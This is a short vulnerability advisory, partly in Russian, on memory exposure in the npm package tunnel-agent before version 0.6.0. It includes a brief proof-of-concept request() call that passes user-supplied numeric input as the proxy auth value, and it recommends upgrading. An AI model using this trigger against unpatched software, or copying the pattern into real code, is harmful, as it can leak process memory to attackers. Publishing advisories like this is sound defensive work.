Описание
Memory Exposure in tunnel-agent
Versions of tunnel-agent before 0.6.0 are vulnerable to memory exposure.
This is exploitable if user supplied input is provided to the auth value and is a number.
Proof-of-concept:
require('request')({
method: 'GET',
uri: 'http://www.example.com',
tunnel: true,
proxy:{
protocol: 'http:',
host:'127.0.0.1',
port:8080,
auth:USERSUPPLIEDINPUT // number
}
});
Recommendation
Update to version 0.6.0 or later.
Пакеты
Наименование
tunnel-agent
npm
Затронутые версииВерсия исправления
< 0.6.0
0.6.0
Дефекты
CWE-200
Дефекты
CWE-200